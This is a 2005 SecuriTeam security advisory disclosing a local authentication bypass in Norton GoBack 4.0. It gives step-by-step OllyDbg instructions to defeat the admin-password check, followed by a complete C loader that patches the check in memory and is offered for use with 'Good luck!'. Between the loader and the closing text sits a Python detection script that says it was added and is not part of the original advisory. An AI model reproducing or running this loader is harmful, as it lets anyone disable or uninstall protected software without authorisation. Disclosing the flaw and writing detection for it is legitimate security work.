[NT] Norton GoBack Local Authentication Bypass

From: SecuriTeam (support_at_securiteam.com)
Date: 08/01/05

    To: list@securiteam.com
    Date: 1 Aug 2005 18:49:13 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      Norton GoBack Local Authentication Bypass
    ------------------------------------------------------------------------

    SUMMARY

    Norton GoBack (http://www.symantec.com/goback/) has "the ability to
    backup and restore changes made in your partitions. Whenever a mistake is
    done, such as caused by a virus infection, you can use the program to
    reset the partition to its original state".

    A vulnerability recently discovered in Norton GoBack allows local users to
    bypass the authentication password that limits use of the product to
    authorized users.

    DETAILS

    Vulnerable Systems:
     * Norton GoBack version 4.0

    Norton GoBack has an authentication mechanism to protect itself. The
    following steps allow setting all authentication control rules to "none".

    1. Run OllyDbg and open the file GBOption.exe in "%Program Files%\Norton
    GoBack". This is the program Norton GoBack uses to change its settings.

    2. Run the program in OllyDbg by pressing F9. A window titled "Norton
    GoBack Options" appears. Choose the 2nd tab and click "Change Level...". It
    shows a window for changing the level of each action: enable/disable,
    uninstall, autobackup... There are three levels: ADMIN, USER and NONE. By
    default, the level for uninstall is ADMIN, meaning that you must have the
    administrator password to uninstall it. After changing the level of these
    actions to NONE and clicking OK, it requires the ADMIN password to
    authenticate (at least when you've set a password before). But here we
    don't have it (lost, forgotten.. :D), so we will bypass it.

    3. Return to OllyDbg and jump to address 0x0043697D: press Ctrl+G, enter
    the address and click OK. OllyDbg moves to this address, where you can see
    this code:

    00436970 > 8B0D A8964700 MOV ECX,DWORD PTR DS:[4796A8]
    00436976 . 50 PUSH EAX
    00436977 . 51 PUSH ECX
    00436978 . E8 93E9FFFF CALL GBOption.00435310
    0043697D . 83C4 08 ADD ESP,8
    00436980 . 85C0 TEST EAX,EAX ; eax == 0 if pwd is correct!
    00436982 . 0F954424 0F SETNE BYTE PTR SS:[ESP+F]

    Note the CALL at address 0x00436978: this is the function GoBack uses to
    check the administrator password. Its return value tells whether the
    password was correct (as the comment on the TEST EAX,EAX instruction
    notes, EAX is 0 when it is, and non-zero otherwise). Because we don't have
    the password, this function will certainly report failure. So we set a
    breakpoint at address 0x0043697D to change its return value: make sure the
    cursor is on 0x0043697D and press F2 to set the breakpoint (the line turns
    red).

    4. Enter any password you want and bypass it. Return to Norton GoBack
    Options and click OK; it asks for the ADMIN password, so enter anything
    you want and press OK. Control now passes to OllyDbg, which runs to the
    address where the breakpoint was set and pauses. Look in the registers
    window of OllyDbg and you'll see EAX = 0x00000090. Double-click it, change
    EAX to 0x00000000 and press F9 to continue. Now you'll see that no warning
    message pops up. All settings you made have been saved. You can check again
    by clicking "Change Level..." to see the result.

    5. Last action. Now, after changing every action level to NONE, you can do
    anything with Norton GoBack without being asked for the ADMIN password. You
    can enable/disable it, uninstall it... Good luck!

    Automatic loader:
    /*
     * AUTHOR: LightPhoenix
     * EMAIL: light.phoenix@gmail.com
     * DATE: 07/20/2005
     *
     * DESCRIPTION:
     * This loader is used in bypassing admin password
     * of Norton GoBack 4.0
     *
     * TODO:
     * Patch in memory at @0x436980
     * Origin: 0x85,0xC0,0x0F,0x95,0x44,0x24,0x0F  (TEST EAX,EAX / SETNE BYTE PTR [ESP+0F])
     * Patch:  0x33,0xC0,0xC6,0x44,0x24,0x0F,0x00  (XOR EAX,EAX  / MOV BYTE PTR [ESP+0F],0)
     */

    // Goback Loader.cpp
    #include <windows.h>

    // Built as an ANSI (non-UNICODE) project: the MessageBox strings are plain
    // char literals, so TEXT() resolves to a char string as well. The command
    // line is a writable array because CreateProcess may modify its buffer.
    TCHAR strExecFile[] = TEXT("GBOptions.exe");
    const char *strTitle =
      "Bypass Norton GoBack 4.0 by LightPhoenix[light.phoenix@gmail.com]";

    int APIENTRY WinMain(HINSTANCE hInstance,
                         HINSTANCE hPrevInstance,
                         LPTSTR lpCmdLine,
                         int nCmdShow)
    {
      HANDLE hFile;
      STARTUPINFO si;
      PROCESS_INFORMATION pi;
      ZeroMemory(&si, sizeof(si));
      si.cb = sizeof(si);          // CreateProcess requires cb to be filled in
      ZeroMemory(&pi, sizeof(pi));

      // Find GBOptions.exe in the current directory
      if( (hFile = CreateFile(strExecFile, 0, FILE_SHARE_READ, NULL, OPEN_EXISTING,
            FILE_ATTRIBUTE_NORMAL, NULL) ) == INVALID_HANDLE_VALUE)
      {
        MessageBox(0, "GBOptions.exe does not exist", strTitle, MB_ICONERROR);
        return -1;
      }
      CloseHandle(hFile);

      // Create the process suspended: the image is mapped but no code has run yet
      if( CreateProcess(NULL, strExecFile, NULL, NULL, FALSE,
            CREATE_SUSPENDED, NULL, NULL, &si, &pi) == FALSE)
      {
        MessageBox(0, "Error executing GBOptions.exe", strTitle, MB_ICONERROR);
        return -1;
      }

      // Patching: read the 7 bytes of the TEST/SETNE sequence
      BYTE buf[10];
      DWORD bytesRead = 0, bytesWritten = 0;
      BOOL readOk = ReadProcessMemory(pi.hProcess, (LPVOID)0x436980, buf, 7, &bytesRead);

      // Compare with the original bytes so only the known build gets patched
      if( readOk && bytesRead == 7 &&
          buf[0] == 0x85 && buf[1] == 0xC0 && buf[2] == 0x0F && buf[3] == 0x95 &&
          buf[4] == 0x44 && buf[5] == 0x24 && buf[6] == 0x0F )
      {
        // Correct! Overwrite with the same-length replacement sequence
        BYTE newData[] = {0x33, 0xC0, 0xC6, 0x44, 0x24, 0x0F, 0x00};
        WriteProcessMemory(pi.hProcess, (LPVOID)0x436980, newData,
                           sizeof(newData) / sizeof(newData[0]), &bytesWritten);

        // Resume the main thread
        ResumeThread(pi.hThread);
        CloseHandle(pi.hProcess);
        CloseHandle(pi.hThread);
        MessageBox(0, "Bypass successfully!", strTitle, MB_ICONINFORMATION);
      }
      else
      {
        // Failed: the bytes do not match, so this is not the expected version
        MessageBox(0, "Wrong size???\nWrong version!", strTitle, MB_ICONERROR);
        TerminateProcess(pi.hProcess, 0);
        CloseHandle(pi.hProcess);
        CloseHandle(pi.hThread);
      }
      return 0;
    }
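    The debugger steps and the loader above share one runtime pattern: a process is created suspended, a write lands inside its mapped image, and the main thread is then resumed. The following detection logic, an added example that is neither the advisory's nor the loader author's code, runs that check over a constructed API-call trace; the trace format, the field names and the GBOption.exe image range are assumptions made for this example.

```python
"""Added example (not the advisory's or its loader author's code): detection logic for
the sequence the steps and loader above describe (create suspended, write into the
mapped image, resume) run over a constructed API-call trace.  Trace format, field
names and the GBOption.exe image range are assumptions made for this example."""
from collections import namedtuple

# Byte sequences quoted in the advisory for GBOption.exe at 0x436980.
ORIGINAL = bytes.fromhex("85C00F9544240F")  # TEST EAX,EAX / SETNE BYTE PTR [ESP+0F]
PATCH = bytes.fromhex("33C0C644240F00")     # XOR EAX,EAX  / MOV BYTE PTR [ESP+0F],0
CREATE_SUSPENDED = 0x00000004               # CreateProcess creation flag
# One trace record: API name, acting pid, target pid, creation flags, address, bytes.
Event = namedtuple("Event", "api pid target flags addr data", defaults=(0, 0, b""))

def detect_suspended_patch(events, image_range):
    """Return one finding per target created suspended, written to inside
    image_range (base, end) while still suspended, and then resumed."""
    base, end = image_range
    pending = {}                            # target pid -> list of (addr, data)
    findings = []
    for ev in events:
        if ev.api == "CreateProcess" and ev.flags & CREATE_SUSPENDED:
            pending[ev.target] = []
        elif ev.api == "WriteProcessMemory" and ev.target in pending:
            if base <= ev.addr < end:       # write lands inside the mapped executable
                pending[ev.target].append((ev.addr, ev.data))
        elif ev.api == "ResumeThread" and ev.target in pending:
            writes = pending.pop(ev.target) # a clean debugger-style launch has none
            if not writes:
                continue
            known = any(data == PATCH for _, data in writes)
            findings.append({
                "pid": ev.pid, "target": ev.target,
                "writes": [(hex(addr), len(data)) for addr, data in writes],
                "verdict": "GoBack auth-bypass patch" if known else "pre-resume image write",
            })
    return findings

# Constructed trace: a benign suspended launch with no writes, then the loader's sequence.
TRACE = [
    Event("CreateProcess", 100, 200, CREATE_SUSPENDED),
    Event("ResumeThread", 100, 200),
    Event("CreateProcess", 300, 400, CREATE_SUSPENDED),
    Event("ReadProcessMemory", 300, 400, addr=0x436980, data=ORIGINAL),
    Event("WriteProcessMemory", 300, 400, addr=0x436980, data=PATCH),
    Event("ResumeThread", 300, 400),
]

if __name__ == "__main__":
    for finding in detect_suspended_patch(TRACE, (0x400000, 0x480000)):
        print(finding)
```

    The same-length constraint on the two byte sequences (both 7 bytes) is what lets the loader patch without shifting the surrounding code, and it is also what makes the write size a usable detection attribute.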

    ADDITIONAL INFORMATION

    The information has been provided by LightPhoenix (light.phoenix@gmail.com).

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

